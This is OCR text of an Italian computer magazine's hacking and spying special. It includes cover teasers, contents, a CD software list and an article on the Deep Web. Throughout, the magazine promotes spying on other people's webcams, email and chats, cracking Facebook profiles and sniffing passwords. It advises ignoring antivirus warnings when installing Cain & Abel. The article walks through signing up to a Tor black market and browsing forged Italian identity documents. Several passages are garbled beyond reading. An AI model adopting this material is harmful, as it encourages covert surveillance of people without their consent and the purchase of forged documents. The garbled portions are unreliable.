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i bugiardi! 


Le tecniche 
per smascherare 
gli autori di documenti 
falsificati email fasulle 
foto taroccate... 


Gli strumenti usati dagli smanettoni per scovare 
"dati scottanti" nascosti in PC e dispositivi mobile 


COSÌ TI CONTROLLO 
DALLA WEBCAM 


Entra con noi nella 


Tecniche e software per "sbirciare" 
da remoto in qualsiasi PC 

I?T!T!rfl Le contromisure da adottare 




per mettere al sicuro il tuo sistema 
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DATI CANCELLATI 
PER SEMPRE 


Scopri come eliminare in maniera 
definitiva file e cartelle rendendone 
impossibile qualsiasi recupero 


SOFTWARE COMPLETO 


SUL CD 


C'è una rete segreta dove circolano documenti 
riservati e altro materiale pronto al download! * 

v Trovi sempre quello che cerchi... e molto, molto di più 
Accedi a ipermercati virtuali dove tutto è sottocosto 
Navighi anonimo e tieni alla larga gli spioni 


FACEBOOK: 

SO TUTTO DI TE! 


Non ci vuole un hacker per bucare 
il tuo profilo Facebook. 

Ti facciamo vedere quanto è facile. 


ACCEDERE NON È FACILE! MA COI NOSTRI TRUCCHI ^ 
E IL SOFTWARE ESCLUSIVO PUOI FARLO ANCHE TU! 


Lo scova hacker 


COMPUTER 

POLIZOTTO 


AGENTE SEGRETO! 


Solo noi ti sveliamo come renderti 


Scopri se ci sono intrusi 
nella tua rete locale con gli 

strumenti software preferiti 
dai pirati informatici 


Diventa investigatore con il tool 
usato dalla Polizia Scientifica. 
Con la nostra guida riuscirai a... 

✓ Spiare e-mail, foto e video altrui 

✓ Curiosare nelle chat dei tuoi amia 

✓ Scovare i download proibiti di eMule&Co 

... e mille altri usi palleschi 


invisibile sul Web e spiare chiunque 
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SOFTWARE COMPLETO 
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www.hostmgsolutions.it 


FATTI TROVARE 


1 utente su 3 naviga da smartphone: non perderlo! 



scegli gonooi: 


FACILE una procedura guidata per creare ex novo il sito mob 
VELOCE poche mosse per trasformare il sito desktop in mob 


GRATIS 1 mese per non poterne più fare a meno 


Hosting Solutions è il punto 
di riferimento per l’hosting. 
Tecnologia, innovazione e qualità 
al servizio delle esigenze dei clienti. 


Hostingsolution 
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Gli strumenti usati dagli smanettoni per scovare 
"dati scottanti" nascosti in PC e dispositivi mobile 
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riservati e altro materiale pronto al download! 
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✓ Accedi a ipermercati virtuali dove tutto è sottocosto eli 

✓ Navighi anonimo e tieni alla larga gli spioni 
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Solo noi ti sveliamo come renderti invisibile sul Web 
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POLIZIOTTO 

Diventa investigatore 
informatico con il 
software usato dalla 
Polizia Scientifica. 


facebook 

SO TUTTO DI TE 

Non ci vuole un hacker! Un semplice 
smanettone può bucare il tuo Facebook. 

Ti facciamo vedere quanto è facile». 


34 



‘♦''Hiv Mitro*#v*.i roncata n »cn-a»; u»« fuabMiw^sctad in 

niwfAw ’njruc n:v*« ypre i(MJwo) w, tstvi... «J*tf 

-rr«ran*o» raampo’^blipct wnòm j ciMidiilc wn<rlUec«oinfm»n 
rtnruiiit'uffon nibTcdJc Mr<-’ioww?*t»il<nirairo^**sA^ 

ire fKpntsoiRii* n*u, miHs** -A»' 'Art: pc lim irWvóI; jaaHurmd mr 
vni«iiidj{-^rw.iuvjfoilal»») iWr.^ o! wwr. ’xicrvn' .iun» 
afcctn xnairi'*w«:i<cVdit l j«e«<l Aitar a? jvrauoitvtMii t.^ftCcv?WM 




























Dati cancellati per sempre!.52 Tutti esperti del PC 

Scopii come eliminare in maniera definitiva file 
e cartelli memorizzati sull'hard disk e renderne 
impossibile il recupero 


con le grandi guide 
di Win Magazine 


Videosorveglianza 

con lo smartphone.54 

Con un app gratuita e un vecchio telefonino Android 
installi n casa un pratico sistema anti-intrusione! 

Chiamate VolP sotto controllo... .56 

Ecco come ascoltare e registrate le telefonate 
via Web sfittando i bug della tecnologia 

Mi faccio il mio cioud personale. .58 

Preoccupato che i dati nella cioud finiscano 
in mani sbagliate? Così crei una nuvola protetta 
da ogni attacco 

Dati a prova d'intercettazione... .62 

Così proteggi i documenti memorizzati sul tuo 
disco rigido e ne rendi impossibile la lettura 
.ad occhi indiscreti 


<£a. 


Così ci spiano i messa; 

lecniche e strumenti usati dai pirati’p 
le conversazioni puvate effettuate con 
WhatsApp! 


Hacker il disco segreto.64 

Abbiamo “srnaaMgiro' con i I kit che buca la 
rete e attiv? ufi canjie automato sul PC del 
malcapitato 
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A grande richiesta, ritornano in edicola I qua¬ 
derni tematici di Win Magazine Così come è 

stato fatto in passato, la redazione ha selezio¬ 
nato cinque argomenti prendendo spunto dalle 
richieste che avete inoltrato via e-mail al team di 
Win Magazine 

Windows 8: la grande guida. Computer & 
Tablet dell'Hacker, Megavideo & Co I cana¬ 
li segreti. Investigatore informatico col PC, 
Software Gratis con codici seriali quest so¬ 
no i titoli dei nuovi Speciali Guide passo passo, 
trucchi avanzati e consigli degli esperti, ti aspet¬ 
tano allinterno delle 500 pagine delle riviste 
Senza dimenticare i supporti multimediali alle¬ 
gati dove troverai centinaia di software gratui¬ 
ti che ti permetteranno di rilettele in pratica le 
nostre idee. Ce ne per soddisfare tutti dal ne¬ 
ofita all'appassionato di computer, dall'assetato 
di sapere tecnologico al fedele seguace di Win 
Magazine. 

Non perderne nemmeno uno! In totale sono 10 
pubblicazioni; i prossimi 5 Speciali di Win arrive¬ 
ranno in edicola a partire da metà dicembre. 
Collezionali tutti! 

La redazione 


Recupero dati per cellulare.74 

Quando tutto sembra perduto chiediamo aiuto 
al PC per ripristinare rubrica, sms, dati.. 


• La mafia delle carte di credito .. .86 

I piffll^^wb sono collegati via Internet a or¬ 
ganizzazioni malavitose internazionali Insieme 
danno la caccia a prede lucrose e tacili da cac¬ 
ciare; i dati delle calte di dedito 


Entra con noi nella Internet 
invisibile.8 

Esisfe una Rete segreta dove circolano film, 
documenti riservati, software... pronti al download! 

Alla ricerca delle cartelle condivise. .14 

Scopai se ci sono intrusi nella tua rete localo 
utilizzando gli strumenti software preferiti dai 
pirati informatici 

La macchina della verità.16 

La guida pratica e i software per trasformare 
il tuo computer i n un perfetto 007 digitale 
“smaschera bugiardi" 

L'aspira password anche dal Web. 20 

Scovato un tool che. come una microspia installata 
nel PC, rivela passwoid, foto e video privati 

L'aspira password per cellulare . .24 

Cè chi trasforma il proprio dispositivo in un 
passepartout per scardinare qualsiasi oprane 

% 

Il computer poliziotto.26 

Installa subito il software Lsato dalla Polizia Scienti- " 
fica e diventa un abile investigatore informatico 

Google: il miglior amico delle spie . .32 

Grazie a particolari chiavi dì ricerca possiamo 
prendere il controllo delle webcam altrui 
e scovare file nascosti 

Facebook sei spiato.34 

Un semplice smanettone può bucare il tuo 
profilo sul social network. Ti facciamo vedere 
quanto è facile 

Così entri in qualsiasi computer. .36 

Ecco la tecnica usata dai pirati per intercettarp 
le connessioni di Rete focosi accedere a 
qualunque PC diventa un gioco da lagazzi 

Segreterie, c'è chi le spia.40 

Ce chi riesce ad origliare dal proprio telefon ino 
i messaggi vocali altrui lasciati in segreteria 

Siamo tutti spiati!.42 

Il 6rande Fratello ti osserva? Ecco come renderti 
invisibile a spie governative e malintenzionati 
mentre navighi su Internet! 

Alla ricerca del file perduto.50 

Hai cancellato per errore immagni e dati da hard disk 
o memory card? Con il tool giusto recuperi tutto 1 


Documenti PDF senza blocchi... .77 

• Perché non liesco a rapare il contenuto di alcuni 
documenti archiviati in foimato PDF? 

• Si può aggirate il blocco della scampa di questi file? 

Il disco sblocca password.78 

Non riesci ad accedere al PC e ad avviare 
Windows? Così recuperi i dati archiviati su disco 

Con una tastiera ci possono spiare. .83 

Keylogger può registrare ciò che viene digitato; 
password, e-mail e chat non sono più al sicuro! 

Anonimi sul Web con una pendrive. 84 

Vuoi navigare, chattane e scaricare file senza farti 
tracciare? Cosi diventi fantasma in Rete 


Chi si nasconde dietro la maschera. 90 

Win Magazine ti svela identità e obiettivi di 
Anonymous, il giuppo hacker più chiacchierato 
del momento 

Il computer come microspia.92 

Webcam e scheda audio del computer possono 
essere usate per spiate casa a distanza. 

Ecco come 

Indagini 2.0.96 

Un cyber-criminale professionista lascia poche 
tracce della sua attività, ma gli esperti le trovano 
ugualmente Diamo uno sguardo alia sede del 
BKA, la polizia tedesca specializzata anche in 
crimini informatici. 


I prezzi di tutti i prodotti riportati all'interno della rivista potrebbero subire variazioni e sono da intendersi IVA inclusa 
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IL ROCCHE FA PER TE 


Gaming al massimo, con le schede madri Z87 



MRXIMUS VI 


MRXIMUB VI 


Joining ROC just got 
more accessible 


Best mATX for gaming 
and overclocking 


Le schede madri ROG GENE sono da sempre la prima scelta per chi pretende il massimo da un sistema 
micro-ATX. Sono infatti le schede madri ufficiali del BlizzCon da tre consecutivi anni e base di partenza 
irrinunciabile dei PC utilizzati nel Campionato Mondiale Battle.net 2012. La nuova GENE Z87 arriva insieme ad 
un’altra new entry della gamma ROG: la MAXIMUS VI HERO. Ultime nate nella famiglia di schede madri Gaming, 
sono caratterizzate da tecnologia e prestazioni da primato associate ad un prezzo molto competitivo. 
Entrambe le schede dispongono del circuito di alimentazione Extreme Engine Digi + III, del processore Audio 
SupremeFX con soli 11 5dB SNR, della tecnologia Sonic Radar, dell’effetto visualizzazione 'overlay in game” e 


della tecnologia GameFirst II, che 
ottimizzare la velocitàdella rete alle 
esigenze dei giochi. Volete dominare? 
Non cercate altrove! 
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Tank Assault £ J 

Un giocò divertente in cui sarai 
alla guida di moderni carrarmati: 
affina la mira, spara e sconfiggi i 
tuoi nemici! 

Fi(e:Tank Assalta:) 220C KB Prtiavrart 

Alien Terminator Deluxe * I 

Il pianeta Terra è in percolo. 
Tocca a te difenderlo! Raccogli 
più armi possibili e fai piazza 
pulita di cieaturine verdi! 

f te Alien- lorrniratrt 7ip 39 1M KB Frettai; 

DesertHawkl J 

Hai un obiettivo; distruggere 
la base terroristica creata dai 
tuoi nemici Vola nei cieli e Fai 
piazza pulita di tutto quello che 
incontrerai 

Flit. OosortMmluip 17.665 KB Fiwoot 


re file da PC e smartphone 

Fio: HU6KB freieare 


AUDIO&VIDEO 


VLC Media Player lui LI 

Streaming video in rete LAN e 
anche dalla Webcam 

File Ut Czif 9.OZ0 KB Freeware 

ConvertAII ILI 

Questa applicazione può 
convertire file video e audio 
in diversi formati 

ri» KmW'ittlzpbttC® Frenare 


UTILITÀ & 
PROGRAMMAZIONE 


Recuva i I 

Riprstina tutti i file cancellati 
persbagio 


WebCamLock i 1 

Controlla il funzionamento della 
tua webcam 

Fie: WebCantoduj) 13 ! ' KB I ««afre 


ANTIVIRUS 
& SICUREZZA 


Steganobnage 

Nascondi file e messaggi nelle 
foto 

Hic: SiepanoliragE^fi i<43KB Fmas 





CMOS Password u O 

alla password 
del BIOS 

iBóKSF'hwj 


Dropbox L66 o 

Uno spazio doud per condivide- Controlla il 


PRODOTTI COMPLETI 




UNetboorin SB 

Installa Linux sulla tua chiavetta 
USB 

Fife : umilrwi» uiig f £50 K8 Ftstv/<re 

Defi li 

DCFT è una distribuzione adibita 


OSFORENSKS essili 

Esaminiamo gli aspetti più nascosti deil'OS 

Questo software, molto potente e gratuito, può esse¬ 
re fatto partire anche da chiavetta USB e ci consente 
di recuperare da un computer i dati che sono stati 
cancellati (volontariamente o per sbaglio). Natural¬ 
mente, oltre al recupero dei file eliminati il program¬ 
ma offre un quadro di tutte le operazioni compiute, 
con l'indicazione temporale degli avvenimenti e con 
ampi dettagli sui diversi file che sono stati coinvolti. 

■ S.O.: Mndows HP/Vsta/ ’ ■ Fic C'SForenstszip ■ D Tensione: 
36.1 W KB Freeware 


CD-ROM 


Attuai Spy a I 

Recupera i tuoi dati di accesso a 
acebook 

Rie: iLtiKHiy^ii 1,540 KB Frewsae 


Fife Rs:j«.F a 2.245 KB f tseware 


EULER1AN VIDEO 
MAGNIF1CATION O 

Macchina della verità? Di più! 

L Eulerian Video Magnification è una tecnica di edi¬ 
ting video messa a punto dai ricercaton del Massa¬ 
chusetts Institute of Technology Si tratta di un ap¬ 
plicazione di realtà aumentata che permette di ana¬ 
lizzare le immagini e cogliere le variazioni di colora¬ 
zione per ogni singolo pixel, mettendo in evidenza 
mutamenti altrimenti invisibili a occhio nudo. 


■ Italiano ■ File: EiXenenlMeoMagntatwizip ■ S O ; Wndms XP/ 
Vista ,78 ■ Dimensione: 2048 KB Tipo: Freeware 


EncryptOnClick 

Cripta i tuoi file con un click. 

Fin tnriypr.'rf.iitkxp 1.575 KB -mwwt 


LEGENDA : 

LiSoftwarc in italiano 


Hide Folders 

Nascondi file e cartelle da occhi 
indiscreti 

Rfe: HìKFotkrcà] 1,245 KE frettare 
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pei usi legati alla Computer 
Forensics 

Fi» iWi72bo ?5BIM5 KB Fimo* 

Comodo keDragon 
Browser ti I 

Il browsei semplice e sicuro 

File.- Cimodn- ir* Dugii 33IB0 KB f mvmt 

TorChatil 

Programma per chattare in 
maniera anonima 
Rf: wmr-wiiivr, 989 553 /ii 568 KB 
Frefvnre 


ownCloud 

I tuo cloud personale 

fife. nwritaUp 8UE5 KB Frerwm 

Ucsniff mi 6 i 

Le tue chiamate VOIP sem¬ 
pre sotto contro) b 

Fto jCSWFFìj 27.719 KB Fraanrr 


PENDRIVE 


XMedia Recode i.4.£ 

Il tuo convertitore portatile 
Fle: XWed«Re:»KteSl46j?p 7210KB 
Freenai 



ImageGrab 506 

[strai le immagini dai tuoi 


filmati 

fi*. imagujah bOzip 1.920 KB frewian 

POP Peeper uo 

Il dient di posta sempre in 
tasca! 

Fi* PtJPf»Mi>er-hEtail^p l_ZO) Kfi 
FtWrate 


CloneSpy 27 

Fai pulizia nel tuo PC 

He: :Slty?)..T t.CO KB rinviare 


INDISPENSABILI 


Orbrt Download» iiusO 

Un nuovo download mana¬ 
ger basato sulla tecnologia 
Peer io Peer 

filerOiInLnp 2.03 KE Frenare 


7-ZjpwoO 

Compattiamo i file nel nuovo 
formato 7z 


^ Rie: 'faiiaji 5 JB? KB frtwrai 

Reaiva^/siJ 

Ripn sti mrtudpf^lapncel lati 
por sbaglio ** W A 

rilf:l!K(na3?7«4 


TrìtaFile o 

Eliminiamo i file dall'hard 
disk 


File TrilaFfajip 588 «8 fnnMit 


uTorrent 23 LI 

Sfrutta la rete Torrent per 
scaricare sempre al massimo 

He ulrrtnup 386 KB Freamie 


Adobe Read» a O 

Visualizziamo e stampiamo i 
documenti in PDF 

Fio: toteRif Xìzc 25.8)0 KE Freeiwiif 

Malwarebytes Anti- 
Malware ut) 

Blocca tuffi i processi colle¬ 
gati all'azione dei malware 
File : Aiti Makwre.zp 2293 KE Fn*iwrt 

Avidemux Final , O 

Video editing di qualità per 
tuffi i nostri filmati 

He wwnwzt 1&8SI© Fregare 


Adobe Shockwave Player 

U.5.9.620 

Player multimediale peri 
contenuti Web 

Qmenwnt '9363 KB fieeww fife. 

SxdWMUÌP 



eMule asoa K I 

Il più famoso programma 
P2P si rinnova! 

Fie. eUutìJSOzp 2.195 KB t; WMiv 



Avast 

Protezione totale per il no¬ 
stro PC 

OircrsinE: !98.385 KB Fremii File 
teslSJip 


Comodo Personal 
Firewall io 

Difendiamo il nostro PC 
dai pencoli della Rete 

BrwuiBic: Ì5F98 KB Fwrvnre file: 


CenatìoFialUri 

Adobe Rash Player 

usa?» il WinWeb Explorer 



<3 Rimare 


K-Lite 
Pack v? 

Tutti i codec per 
multimediali 

CtnftKicoe 21071K3 F'etnau Fie: 

kmadKzti 


Accedi in sicurezza 
nella Internet invisibile 
D musmè: 23) KBTixk trovai He: 

tVWAtó)Fxrtm.S) 

Simple Porr Forwarding 

porte del tuo 

FieewarcFie: 


TrueCrypt 

Potente tool di crittografìa 

timrnaw 3.386 KB Tipo- fnwiare file: 

I 

' {rjttrypLdii 


SicurPas Pro t 

; I tuoi file a prova di bomba 
Jmnsm: 6.WC KB lino- f remare File: 


Si'rpss/ip 



Net Miner + Ifladestu 

Enfia nel PC alla ricerca di 
e-mail foto e video privati 
Smanine: 3126 KB Tipi) Fnwnre File: 

KetiwaikMiiBfzip 

HttpWatch Basic ioti 
: Verifiche di sicurezza su siti Web 
Shiibto : li 268 KBIor firmar? 

fa* Tittpwntcìutp 

Ashampoo File Wìper 

Cancellazioni a prova di re¬ 
cupero pei file e documenti 

• Dir«nsisifi:lJ226KB tipi Crmmei'CRle 
FiF: FirìVipentj 
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Un pronto recupero per le password perdute 

Sniffer in grado di analizzare il traffico che scorre sul¬ 
la rete. Il software analizza le tante informazioni che 
transitano sulia nostra connessione mostrandole 
ordinate e in forma leggibile. Ideale per recuperare 
password smarrite e controllare le connessioni atti¬ 
ve (sia in entrata che in uscita) Attenzione: durante 
l'installazione di Cain 8. Abel alcuni antivitus potreb¬ 
bero rilevare il software come un possibile pericolo. 
Ignonamo tranquilamente gli avvisi e terminiamo la 
procedura di setup. 

■ SO : Wnrtws XP/Vsta/7 ■ Rie: rarnsabeliip ■ Dot easone: 

8.041 KBFreeu/are 


HIDE FOLDERS lì 

Nascondi file e cartelle da occhi indiscreti 

Hide Folders è un software totalmente gratuito 
ed utilizzabile senza alcun tipo di pioblema su 
tutti i sistemi operativi Windows die, una volta 
in uso, permetterà di proteggere file e cartelle 
nascondendoli agli occhi di altri eventuali utenti 
indiscreti. Consente inoltre di proteggere l'acces¬ 
so alle sue funzioni mediante un'apposita pas¬ 
sword in modo tale che nessuno, eccezion fatta 
per gli utenti a conoscenza della parola chiave 
scelta, possano servirsene 


■ Italiano : ■ SO.: Windows XP/Vetatf/8 ■ Fie: HtdefoManuip 

■ Dimensione: 2.249 KB Freeware 
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CMOS PASSWORD s o 

Come accedere alla password dimenticata 
del BIOS 

Se abbiamo dimenticato la password per [accesso al 
BIOS potremo utilizzare questo software per rimedia¬ 
re al problema e continuare ad utilizzare il computer 
come al solito Bisogna avviare il programma con il 
comando CMOSPWD e provare le password stan¬ 
dard del BIOS fino a trovare quella giusta Tra i bios 
supportati, funziona con ACFR'IBM Compaq (1992), 
Compaq iNewversioni, IBM (PS/2, Actrva. ThmkpadL 
Packard Bell, Phoenix 4 retease 6 (User), Gateway So¬ 
lo Phoenix 4 0 release 6 e Toshiba. 

■ SU.: Wntrrws 200n/XPrtfeta/7 ■ Ohnenaone-106 KB ■ fife: 
cirospwtl.zip 
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Esiste una Rete segreta dove 
circolano film, documenti riservati, 
software... pronti al download! 
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BROWSER WEB 

WINWEB 

EXPLORER 

Lo trovi su. ‘'CD 
Qua'ito cut .a Gratuito 
Sto Internet: 


www.winmagazfie. 

Mink/2159 


L a parola d'ordineè semplicità. Con la sem¬ 
plicità e la curiosità possiamo affrontare 
qualunque argomento e addentrarci in 
questioni anche spinose, come il famigerato 
Deep Web, che ha scatenato la fantasia di tanti 
internauti. Iniziamo a capire innanzitutto di 
cosa stiamo parlando. La traduzione italiana 
sarebbe Web profondo, che rimanda ad ini 
magini inquietanti. In pai te è vero, ma non del 
tutto. Traduciamo invece l'espressione Deep 
Web con Web sommerso e spieghiamo subito 
come funziona. 11 Web così come siamo abituati 
a conoscerlo viene indicizzato dai motori di 
ricerca che ci mostrano i siti in base alle parole 
chfove delle nostre ricerche: questo ò quel lo che 
riamo, che ci è stalo insegnato. Ma questo 
ni è "àUVeb ', ne è solo una parte. Ci sono pa- 
«’ioni che non vengono indicizzale, 
perchetHoio c impedito l'accesso dei motori di 
ricerca, puressendo pagine pubbliche. Prima 
di gridare allo scandalo, pensiamo una cosa 
semplice: ci farebbe piacere se un motore di ri¬ 
cerca indicizzasse e restituisse come risultato di 
una ricerca la nostra pagina di posta o la nostra 
cronologia delle conversazioni su Skype? Ecco, 
appunto. Tutte queste pagine, d i posta, di chat, 
molti forum, comunicazioni interne aziendali, 
ma anche quelle protette da una password o i 
database scientifici e persino tutte le situazioni 
Internet create per i cellulari, si muovono nel 
Deep W'eb. Adesso suona meno sinistro, vero? 
È semplicemente logico che alcune pagine non 
debbano essere indicizzate. Sono private! Que¬ 
sto non significa, però, che il Deep Web sia un 
mondo perfetto. Esattamente come nel Web che 
conosciamo, anche qui abbiamo una trasposi¬ 
zione dellarealtà in cui viviamo, quindi ci sono 
i buoni e i cattivi. I cattivi si trovano qui perché 
costruiscono i loro siti impedendo ai motori 
di ricerca di indicizzarli e non perché il Deep 
Weeb sia la luto sede naturale. IIDeepWebcsolo 
Deep W eb. Per semplificare la con (prensione d i 
cosa sia in effetti questo Deep Web possiamo 






noi nella 
invisibile 
























L'HIdden Wiki è il punto di partenza da cui cominciare le navigazioni nel Deep Web. 


pensare ad un grosso iceberg, di cui solo una 
piccola parte risulta visibile (circa un terzo); la 
parte rimanente è sommersa (Deep, appunto). 
Qui dimorano i database deile biblioteche, le 
pagine con password e insonima.fhuti ciò di 
cui abbiamo accennato sopra. La rtumcanzadi 
vi sibilila dipendr dal fatto che è neres^Sriatira 
maggiore protezione di questi dati, accessibili 
solo a persone autorizzate. I media ultimamente 
hanno un po' troppo demonizzalo il Deep Web, 
trattandolo come u n luogo sordido e illega le. Per 
la maggioranza dei casi non òrosi, ma vedremo 
come pu rtroppo, proprio per la maggiore effi¬ 
cienza di questa parte della Rete nel trattare 
la riservatezza, è proprio qui che alcuni filoni 
illegali si sono sistemati con i loro siti. F. lo hanno 
fatto alla grande! 

Come ci si immerge? 

Accedere alla rete sommersa non è immediato, 
ma nemmeno complicatissimo. Innanzitutto, 
visto che il Deep Web si basa sulla tutela della 
privacy, è fondamentale navigare in anonimato. 
Quando ci muoviamo su Internet, lasciamo 
una serie di informazioni in giro. Queste in¬ 


formazioni possono essere raggruppate in due 
categorie; le informazioni inserite da noi stessi, 
come i dati sul Web, i testi delle e-mail e cosi 
via e poi le informazioni indirette, quelle cioè 
che vengono lasciate in automatico ad ogni 
nostro movimento. 'I ali informazioni sono per 
Adempio il nostro indirizzo il’, che permette di 

10 caligare geograficamente il computer (ed 
ecco spiegati i perché la pubblicità che trovia¬ 
mo nefifci(É5jj ùfcjtianio quotidianamente è 
cosi “viciira fc alim) ; il ht$\vser che utilizziamo 
cin chelingun,rBm«lnpiBche eicookie, la 
cronologia e poi ancoralorlcerche rhefag'iamo 
su Internet, file temporundtdnlire amenità, 
inutile dire che un utilizzatore iiwtiio di coni 
puter non ha le conoscenze tecniche per agi re 
personalmentce cancellare o rendere anonimi^ 
lutti i dati; ma il problema non si pone, perché 
basta installare Win Web Explorer, il browser 
personalizzato Win Magazine, e il gioco è fatto. 
Non solo, vedremo anche come, grazie alla no¬ 
stra personalizzazione, sarà facile sia accedere 
al Deep Web sia compiere operazioni come 

11 salvataggio dei Preferiti in tutta sicurezza. 
Una volta estratto e installato il programma 


sul computer, avviandolo si apre una finestra 
particolare di i irefox, riconoscibile dailogu blu. 
Per navigare in anonimato i passi da compiere 
sono due: clicchiamo sull'icona X che si trova 
nella barra di stato e poi sulla voce Actiire. 

Gli indirizzi del Deep Web 

Da questo momento siamo anonimi sul Web! 
Per una maggiore sicurezza, possiamo abilitare 
anche l’opzione Steaith e indicare uno dei Paesi 
presenti nella lista Countries dal quale simule¬ 
remo il nostro collegamento alla Rete. Sarà cosi 
impossibile risalire a noi! Fin qui, però, abbiamo 
solo reso anonima la navigazione, ma non siamo 
ancora dentro la parte sommersa del Web. 1 a 
difficoltà maggiore chéabbiamo, anche adesso 
che siamo ‘'dentro”, è come accedere ai siti e 
alle pagine che dimorano sul Deep Web. Non 
si traila solo di non conoscere gli indirizzi, ma 
anchee soprattutto di avere in questocaso una 
struttura di indirizzi completamente diversa da 
quella cui siamo abituati. 

Un indirizzo deep, infatti, ha una struttura si¬ 
mile a j2W^sAHHlIriSrdiP=5.oninn. Ci viene 
in aiuto la Hidden Wiki, che ci fornisce una 
catalogazione di siti della rete Tor, che sono 
appunto quegli indirizzi che hanno estensione 
.onion. L'indirizzo della Hidden Wiki è www. 
vvinmagazine.it/Iink/195fUsitisono catalogati 
per tipologia e sulla destra abbiamo una barra 
laterale che ci permette una facile consulta¬ 
zione di tutte le categorie. Dando un'occhiata 
ploce, vediamo che d sono molte categorie, pili 
aeno legittime, che spaziano da siti per il file 
stitrifig, a market, molti forum, fino ad arrivare 
poi|$ ; ffrgornenti piti precisi come droga, sesso 
earmf Iniziamo la nostra gita in questo mondo 
partendo dalla sezione Introduction Pointc he 
ci mette a disposizione alcuni motori di ricérca 
specifid perii Deep Web. Il nostro amato Google 
qui non potrebhp fare molto per noi! Proviamo 
a caricare TOR DIR, cliccando sul link che tro¬ 
viamo nella sezione, in questo sito troviamo 


ANONIMI NEL DEEP WEB CON TOR 



Con i! termine Tor, acronimo di The Onion 
Routers, ci si riferisce ad una rete basata 
su nodi di comunicazione chiamati relay 
che altro non sono se non server inter 
mediari attraverso i quali viaggiano i dati 
prima di arrivare a destinazione. I relay 
possono essere i nostri stessi computer: 
infatti possiamo autorizzare il network a 
trasformare il nostro PC in un server Tor. 
I dati prima di arrivare al server del sito 
Web richiesto passano in questi nodi in 
maniera casuale ed utilizzando sempre 
un percorso differente. La rete modifica 
il tragitto dei dati ogni dieci minuti e in 


maniera del tutto automatica. Dopodiché 
i dati stessi vengono fatti transitare attra¬ 
verso un altro circuito anonimo. Questi 
tipi di server, chiamati anche Onion rou¬ 
ters (il termine onion ricorda I veli di una 
cipolla...), non sono altro che proxy che 
utilizzano il protocollo di trasmissione 
Socks4A. In questo modo i siti Web non 
capiscono da dove ricevono una richiesta. 
Inoltre, tutti i dati scambiati tra i server 
sono autografati per impedirne la lettura. 
Come conseguenza negativa abbiamo un 
rallentamento della navigazione, però ci 
si guadagna in sicurezza. 
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L’ipermercato virtuale è aperto 
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- Tante catego rie 

Le categorie merceologiche sono sulla sini¬ 
stra. mentre nella nome page c’è una carrel¬ 
lata di prodotti. Quando cucchiamo su una categoria 
si apre una finestra come sottocategone. Se siamo 
interessati ad una in particolare, cicchiamoci sopra 
per entrare nella sezione dedicata. 



^ WinWeb Ex plorer è pronto! 

Scompartiamo l'archivio WinWebExptorer. 
zrp(presente sul Web DVD) e installiamo 
del browser eseguendo il file EXE Segusino la pro¬ 
cedura guidata e, quando richiesto ciiashiarii/er- 
metti questa installatone per attivare! 

Quindi cliochiamo Fine 



Iscriviamoc i al mercato 

2 Caricato il sito del Black Market, cucchia¬ 
mo Register Niente paura però, perche 
non dovremo inserire alcun dato sensibile. Basta 
una passvvord e uno username e stabilire, ciccando 
sul menu a tendina, che tipo di registrazione effel- 
Quella come compratore è totalmente gratula 


^ Effe ttuiamo il loqin 

Per il completamento della registrazione cre¬ 
iamo una seconda password che serve per 
prelevare denaro dal nostro conto Al termine, tor¬ 
niamo alla pagina di togm etì effettuiamo l’accesso 
al market. Inseriamo lo username e la password ed 
evitiamo di spuntare la casella Remember me. 



^ Prov iamo i documenti 

Una categoria è quella dei documenti. É faci¬ 
le che qualcuno voglia cambiare identità, o 
gli serva una patente falsa, no? Qui si compra tutto. 
Scorrendo la lista di documenti disponibili, troviamo 
che tutto il mondo è coperto. Cicchiamo sulla paten¬ 
te italiana e vediamo l'offerta. 


* C he servizio efficiente ! 

; - Il venditore ci infama che può creare docu¬ 
menti di tutti i tip basta che siano su tesse 
rino in PVC. Via libera quindi a codici fiscali, patenti, 
carte Ci identità. Per il momento spedisce solo in Ita¬ 
lia e il costo è b stesso per ogni tipo di documento, 
cioè 400 euro o 43.75344 Bitcoin 


indirizzi del network Tor. Nella sezione Ubrary 
possiamo scovare testi in diverse lingue e su 
diversi argomenti, che magari non riusciamo 
ad avere attraverso i normali canali di ricerca. 
Aprendo un sito, la prima cosa che balza all’oc¬ 
chio è la struttura scarna. La caratteristica del 
Deep Web è intatti quella di non avere grafica, 
ma di ordinare le notizie come u na lista di link 
Se consideriamo quanto detto in precedenza 
sulla tipologia di pagine che troviamo qui, la 
cosa è anche naturale. Comunque una volta 
che abbiamo trovato quello che cerchiamo, 
basta cliccarci sopra per aprirlo o salvarlo. Per i 
testi, solitamente informato PDF, è consigliato 


non aprirli direttamente nel browser per non 
compromettere l'anonimato della navigazione. 

Pronti per il nostro 
viaggio nel Deep Web 

Per le ricerche abbiamo usato The Abyss, rag¬ 
giungibile dalla i lidden Wiki. Anche in questo 
caso nu 11 altro abbiamo che il campo per inserire 
la nostra chiave di ricerca. Abbiamo cercalo 
materiale sull'esoterismo per fare una prova e 
il risuI tato sono staii due indi rizzi che ci han no 
dato accesso ad un gruppo di discussione e 
scambio di materiale su Esoterismo e religione. 
Per accedere serve una registrazione e il forum 


stesso consiglia di usare un’e-mailfasulla! 
Troviamo anche molti forum di discussione 
su argomenti di varia umanità. Tornando alia 
Hidden Wild, basta che andiamo all’omoni¬ 
ma sezione e scegliamo l'argomento che ci 
interessa, leggendo la breve descrizione che 
accompagna i link proposti Tra i blog segna¬ 
liamo la Ecvclopedia Dramatica, un portale 
che racchiude informazioni e sezioni su diversi 
argomenti. Giocando sui portali proposii si 
accede a sezioni tomai iche dove si trovano in 
formazioniche altrove non sono cosi facilmente 
reperibili. Abbiamoiatlo un giro tra le sezioni 
sesso e hackeringe in effetti tra lesti, immagini, 
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video c guide, ce n’èpertutti i gusti. 1 server del 
Deep Web ospitano anche i database di molti 
enti scientifici e con una ricerca paziente si 
possono trovare studi e dati interessanti su 
diverse materie, dalla medicina all’energia. 
Anche Wikileaks tiene il proprio materiale 
sul Deep Web, per proteggerlo dagli attacchi 
di quanti vorrebbeto mettere le mani sulle in¬ 
formazioni possedute dal portalemformativo. 
Su i lidden Wiki si trovano diversi indirizzi di 
Wikileaks, rutti facilmente raggiungibili (gli 
ultimi aggiornamenti si trovano, ad esempio, 
su http://zbnnr7qzaxlk5tms.onion.to). 
Purtroppo il Deep Web è anche la sede di molte 


attività illecite. Abbiamo trovato il campiona¬ 
rio completo e possiamo affermare che qui, 
in molti casi, si va oltre le più pessimistiche 
e inimmaginabili possibilità. La conoscenza 
di questo aspetto del Deep Web parte anche 
in questi caso dalla lista si indirizzi registrati 
da Hidden Wiki. Poiché la maggior parte del¬ 
